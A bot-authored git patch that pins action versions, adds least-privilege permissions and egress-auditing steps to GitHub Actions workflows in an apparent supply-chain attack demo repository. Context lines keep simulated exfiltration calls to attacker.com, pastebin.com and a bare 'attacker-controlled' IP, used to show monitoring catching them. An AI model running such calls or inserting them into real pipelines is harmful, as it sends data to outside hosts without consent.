From 8dfe7284f5a7bb9d5fd190efcceac4d9d622e44f Mon Sep 17 00:00:00 2001 From: "stepsecurity-int[bot]" <185740846+stepsecurity-int[bot]@users.noreply.github.com> Date: Fri, 27 Jun 2025 08:19:16 +0000 Subject: [PATCH] Apply security best practicesSigned-off-by: StepSecurity Bot --- .github/workflows/PRTargetWorkflow.yml | 9 +++++++++ .github/workflows/anomalous-outbound-calls.yaml | 6 +++++- .github/workflows/arc-codecov-simulation.yml | 4 ++-- .github/workflows/arc-secure-by-default.yml | 16 ++++++++++++++++ .github/workflows/arc-solarwinds-simulation.yml | 7 ++++++- .../workflows/arc-zero-effort-observability.yml | 7 ++++++- .github/workflows/baseline_checks.yml | 8 ++++---- .github/workflows/block-dns-exfiltration.yaml | 6 +++++- .../changed-files-vulnerability-with-hr.yml | 4 ++-- .../changed-files-vulnerability-without-hr.yml | 7 ++++++- .../workflows/hosted-file-monitor-with-hr.yml | 6 +++--- .../workflows/hosted-file-monitor-without-hr.yml | 9 +++++++-- .github/workflows/hosted-https-monitoring-hr.yml | 9 +++++++-- .../workflows/hosted-network-filtering-hr.yml | 10 +++++----- .../workflows/hosted-network-monitoring-hr.yml | 6 +++--- .github/workflows/hosted-network-without-hr.yml | 11 ++++++++--- .github/workflows/publish.yml | 4 ++-- .github/workflows/secret-in-build-log.yml | 6 +++++- .../self-hosted-file-monitor-with-hr.yml | 7 ++++++- .../self-hosted-network-filtering-hr.yml | 4 ++-- .../self-hosted-network-monitoring-hr.yml | 7 ++++++- .../tj-actions-changed-files-incident.yaml | 4 ++-- .github/workflows/toc-tou.yml | 10 ++++++++++ .github/workflows/unexpected-outbound-calls.yml | 6 +++++- 24 files changed, 132 insertions(+), 41 deletions(-) diff --git a/.github/workflows/PRTargetWorkflow.yml b/.github/workflows/PRTargetWorkflow.yml index 8bf0debd9..6ffe115b8 100644 --- a/.github/workflows/PRTargetWorkflow.yml +++ b/.github/workflows/PRTargetWorkflow.yml @@ -7,11 +7,20 @@ on: - synchronize - reopened +permissions: {} + jobs: pr-target-check: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - name: Check out code uses: actions/checkout@v4 diff --git a/.github/workflows/anomalous-outbound-calls.yaml b/.github/workflows/anomalous-outbound-calls.yaml index 2e87a976c..e26739fd1 100644 --- a/.github/workflows/anomalous-outbound-calls.yaml +++ b/.github/workflows/anomalous-outbound-calls.yaml @@ -1,13 +1,17 @@ name: Anomalous Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: AnomalousOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit - run: "curl https://pastebin.com -L || true" diff --git a/.github/workflows/arc-codecov-simulation.yml b/.github/workflows/arc-codecov-simulation.yml index dd1ab7dc9..74b94e2c5 100644 --- a/.github/workflows/arc-codecov-simulation.yml +++ b/.github/workflows/arc-codecov-simulation.yml @@ -7,7 +7,7 @@ jobs: runs-on: self-hosted steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: block allowed-endpoints: > @@ -28,7 +28,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/arc-secure-by-default.yml b/.github/workflows/arc-secure-by-default.yml index 96a7098dc..d389c9e80 100644 --- a/.github/workflows/arc-secure-by-default.yml +++ b/.github/workflows/arc-secure-by-default.yml @@ -2,18 +2,34 @@ name: "ARC: Secure-By-Default Cluster-Level Policy" on: workflow_dispatch: +permissions: {} + jobs: direct-ip-hosted: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 # Codecov Scenario: Exfiltrate data to attacker's IP address - name: Data Exfiltration To Attacker Controlled IP address run: curl 104.16.209.12 --connect-timeout 5 direct-ip-arc: + permissions: + contents: read # for actions/checkout to fetch code runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 # Codecov Scenario: Exfiltrate data to attacker's IP address diff --git a/.github/workflows/arc-solarwinds-simulation.yml b/.github/workflows/arc-solarwinds-simulation.yml index 72ce7c177..febaa3ff9 100644 --- a/.github/workflows/arc-solarwinds-simulation.yml +++ b/.github/workflows/arc-solarwinds-simulation.yml @@ -6,6 +6,11 @@ jobs: arc-solarwinds-simulation: runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/arc-zero-effort-observability.yml b/.github/workflows/arc-zero-effort-observability.yml index 5cb8daacc..502ec9b22 100644 --- a/.github/workflows/arc-zero-effort-observability.yml +++ b/.github/workflows/arc-zero-effort-observability.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: self-hosted steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/baseline_checks.yml b/.github/workflows/baseline_checks.yml index 06fc0bc75..a2cc2aa6f 100644 --- a/.github/workflows/baseline_checks.yml +++ b/.github/workflows/baseline_checks.yml @@ -7,11 +7,11 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@int-sh + - uses: step-security/harden-runner@668ad3cce4bd0191ec8fdd9868adcb7521a9dacd # int-sh with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -22,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/block-dns-exfiltration.yaml b/.github/workflows/block-dns-exfiltration.yaml index 767d5d981..dbf19ae3c 100644 --- a/.github/workflows/block-dns-exfiltration.yaml +++ b/.github/workflows/block-dns-exfiltration.yaml @@ -1,13 +1,17 @@ name: Block DNS Exfiltration With Harden-Runner on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code name: Deploy runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: block allowed-endpoints: | diff --git a/.github/workflows/changed-files-vulnerability-with-hr.yml b/.github/workflows/changed-files-vulnerability-with-hr.yml index d8ed7379f..b5dc177a1 100644 --- a/.github/workflows/changed-files-vulnerability-with-hr.yml +++ b/.github/workflows/changed-files-vulnerability-with-hr.yml @@ -15,7 +15,7 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: disable-sudo: true egress-policy: block @@ -29,7 +29,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/changed-files-vulnerability-without-hr.yml b/.github/workflows/changed-files-vulnerability-without-hr.yml index 4b74464f1..6090b6f3a 100644 --- a/.github/workflows/changed-files-vulnerability-without-hr.yml +++ b/.github/workflows/changed-files-vulnerability-without-hr.yml @@ -14,6 +14,11 @@ jobs: runs-on: ubuntu-latest name: Test changed-files steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v4 with: fetch-depth: 0 @@ -21,7 +26,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v40 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/hosted-file-monitor-with-hr.yml b/.github/workflows/hosted-file-monitor-with-hr.yml index eeb3b63f6..88ea30c60 100644 --- a/.github/workflows/hosted-file-monitor-with-hr.yml +++ b/.github/workflows/hosted-file-monitor-with-hr.yml @@ -6,7 +6,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit @@ -17,13 +17,13 @@ jobs: cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-file-monitor-without-hr.yml b/.github/workflows/hosted-file-monitor-without-hr.yml index a673fca8c..5498dcdcc 100644 --- a/.github/workflows/hosted-file-monitor-without-hr.yml +++ b/.github/workflows/hosted-file-monitor-without-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: ubuntu-latest steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - name: npm install @@ -13,13 +18,13 @@ jobs: cd ./src/backdoor-demo npm install - - uses: madhead/semver-utils@latest + - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-https-monitoring-hr.yml b/.github/workflows/hosted-https-monitoring-hr.yml index 379884875..7ad50ad83 100644 --- a/.github/workflows/hosted-https-monitoring-hr.yml +++ b/.github/workflows/hosted-https-monitoring-hr.yml @@ -2,17 +2,22 @@ name: "Hosted: HTTPS Monitoring with Harden-Runner" on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for JasonEtco/create-an-issue to read template files + issues: write # for JasonEtco/create-an-issue to create new issues runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit - uses: actions/checkout@v3 - - uses: JasonEtco/create-an-issue@v2 + - uses: JasonEtco/create-an-issue@1b14a70e4d8dc185e5cc76d3bec9eab20257b2c5 # v2.9.2 env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/hosted-network-filtering-hr.yml b/.github/workflows/hosted-network-filtering-hr.yml index 7dd7dcbfa..e55801ae3 100644 --- a/.github/workflows/hosted-network-filtering-hr.yml +++ b/.github/workflows/hosted-network-filtering-hr.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: disable-sudo: true egress-policy: block @@ -17,7 +17,7 @@ jobs: registry.npmjs.org:443 www.githubstatus.com:443 - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -28,17 +28,17 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - - uses: madhead/semver-utils@latest + - uses: madhead/semver-utils@36d1e0ed361bd7b4b77665de8093092eaeabe6ba # latest id: version with: version: 1.2.3 - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-monitoring-hr.yml b/.github/workflows/hosted-network-monitoring-hr.yml index 0aa554773..8ec087404 100644 --- a/.github/workflows/hosted-network-monitoring-hr.yml +++ b/.github/workflows/hosted-network-monitoring-hr.yml @@ -10,7 +10,7 @@ jobs: with: egress-policy: audit - - uses: crazy-max/ghaction-github-status@v4 + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -21,12 +21,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/hosted-network-without-hr.yml b/.github/workflows/hosted-network-without-hr.yml index 3533b8c72..8c3cc0f4b 100644 --- a/.github/workflows/hosted-network-without-hr.yml +++ b/.github/workflows/hosted-network-without-hr.yml @@ -6,7 +6,12 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: crazy-max/ghaction-github-status@v4 + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + + - uses: crazy-max/ghaction-github-status@fa6ac37620bc5d44b93e15caed498629665e9ff5 # v4.2.0 - uses: actions/checkout@v3 @@ -17,12 +22,12 @@ jobs: - name: get-npm-version id: package-version - uses: martinbeentjes/npm-get-version-action@v1.3.1 + uses: martinbeentjes/npm-get-version-action@3cf273023a0dda27efcd3164bdfb51908dd46a5b # v1.3.1 with: path: src/exfiltration-demo - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index f42852631..122439ddc 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -6,7 +6,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: step-security/harden-runner@v2 + - uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit - uses: actions/checkout@v3 @@ -15,7 +15,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/secret-in-build-log.yml b/.github/workflows/secret-in-build-log.yml index 847c1ca10..dc7f596cf 100644 --- a/.github/workflows/secret-in-build-log.yml +++ b/.github/workflows/secret-in-build-log.yml @@ -3,15 +3,19 @@ name: Secret in Build Log on: workflow_dispatch: +permissions: {} + jobs: build: + permissions: + contents: read # for actions/checkout to fetch code runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: harden-runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit diff --git a/.github/workflows/self-hosted-file-monitor-with-hr.yml b/.github/workflows/self-hosted-file-monitor-with-hr.yml index a53608566..db6b71981 100644 --- a/.github/workflows/self-hosted-file-monitor-with-hr.yml +++ b/.github/workflows/self-hosted-file-monitor-with-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: [self-hosted, ec2] steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/backdoor-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-filtering-hr.yml b/.github/workflows/self-hosted-network-filtering-hr.yml index 815f293ea..6e830ef9a 100644 --- a/.github/workflows/self-hosted-network-filtering-hr.yml +++ b/.github/workflows/self-hosted-network-filtering-hr.yml @@ -7,7 +7,7 @@ jobs: runs-on: [self-hosted, ec2] steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: block allowed-endpoints: > @@ -24,7 +24,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/self-hosted-network-monitoring-hr.yml b/.github/workflows/self-hosted-network-monitoring-hr.yml index 5f0ba2320..0b6f94802 100644 --- a/.github/workflows/self-hosted-network-monitoring-hr.yml +++ b/.github/workflows/self-hosted-network-monitoring-hr.yml @@ -6,6 +6,11 @@ jobs: build: runs-on: [self-hosted, ec2] steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: @@ -15,7 +20,7 @@ jobs: cd ./src/exfiltration-demo npm install - name: Publish to Registry - uses: elgohr/Publish-Docker-Github-Action@v5 + uses: elgohr/Publish-Docker-Github-Action@4feac4d53e4e55dcc5d3e2ad0ed2e0a76028ff7a # v5 with: name: ${{ github.repository }}/prod:latest username: ${{ github.actor }} diff --git a/.github/workflows/tj-actions-changed-files-incident.yaml b/.github/workflows/tj-actions-changed-files-incident.yaml index 7426c56fb..6641e1f6b 100644 --- a/.github/workflows/tj-actions-changed-files-incident.yaml +++ b/.github/workflows/tj-actions-changed-files-incident.yaml @@ -14,7 +14,7 @@ jobs: name: Test changed-files steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: disable-sudo: true egress-policy: audit @@ -26,7 +26,7 @@ jobs: # Example 1 - name: Get changed files id: changed-files - uses: tj-actions/changed-files@v35 + uses: step-security/changed-files@95b56dadb92a30ca9036f16423fd3c088a71ee94 # v46.0.5 - name: List all changed files run: | diff --git a/.github/workflows/toc-tou.yml b/.github/workflows/toc-tou.yml index 50ca25cb9..d9a4639f6 100644 --- a/.github/workflows/toc-tou.yml +++ b/.github/workflows/toc-tou.yml @@ -15,6 +15,11 @@ jobs: contents: read pull-requests: read steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v4 - name: Wait for demo purposes @@ -40,6 +45,11 @@ jobs: contents: read pull-requests: read steps: + - name: Harden the runner (Audit all outbound calls) + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 + with: + egress-policy: audit + - uses: actions/checkout@v4 - name: Wait for demo purposes diff --git a/.github/workflows/unexpected-outbound-calls.yml b/.github/workflows/unexpected-outbound-calls.yml index f53167970..c9d2f41c1 100644 --- a/.github/workflows/unexpected-outbound-calls.yml +++ b/.github/workflows/unexpected-outbound-calls.yml @@ -1,13 +1,17 @@ name: Unexpected Outbound Calls on: workflow_dispatch: +permissions: {} + jobs: unexpected-outbound-calls: + permissions: + contents: read name: UnexpectedOutboundCalls runs-on: ubuntu-latest steps: - name: Harden Runner - uses: step-security/harden-runner@v2 + uses: step-security/harden-runner@002fdce3c6a235733a90a27c80493a3241e56863 # v2.12.1 with: egress-policy: audit - run: "curl https://attacker.com -L || true"